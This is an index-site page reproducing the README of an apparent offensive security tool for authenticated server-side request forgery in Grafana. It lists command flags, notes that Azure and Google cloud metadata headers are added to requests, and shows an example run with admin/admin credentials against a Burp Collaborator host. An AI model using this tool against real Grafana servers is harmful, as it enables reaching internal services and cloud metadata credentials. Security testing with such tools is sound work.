Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/RandomRobbieBF/grafana-ssrf

Authenticated SSRF in Grafana
https://github.com/RandomRobbieBF/grafana-ssrf

Last synced: about 1 month ago
JSON representation

Authenticated SSRF in Grafana

Awesome Lists containing this project

README

        

# grafana-ssrf
Authenticated SSRF in Grafana.

Notes
---

* Azure metadata header has been added to all SSRFS
* Google metadata header has been added to all SSRFS
* SSRF will not follow redirects no matter what so ensure url is direct.
* If login is via SSO or other none grafana logins please grab your session cookie and use the -s flag

Usage
---

```
usage: grafana-ssrf.py [-h] [-s SESSION] [-u URL] [-H HOST] [-f FILE] [-U USERNAME]
[-P PASSWORD]

optional arguments:
-h, --help show this help message and exit
-s SESSION, --session SESSION
Session Cookie Value
-u URL, --url URL URL of host to check will need http or https
-H HOST, --host HOST Host for Grafana
-f FILE, --file FILE File of URLS to check SSRF Against
-U USERNAME, --username USERNAME
Username for Grafana
-P PASSWORD, --password PASSWORD
Password for Grafana
```

Example
---

```
python3 grafana.py -U admin -P admin -H http://localhost:3000 -u http://8t2s8yx5gh5nw0z9bd3atkoprgx6lv.burpcollaborator.net
Refreshed Sources
SSRF Source Updated
Status code: 200
Response body: c7yzzb4zyj5v14wkpi2nxvzjigz
Deleted Old SSRF Source
```

Don't forget to check out what jobs we have open!

https://bishopfox.com/jobs#open-positions - Come Join the Fox's!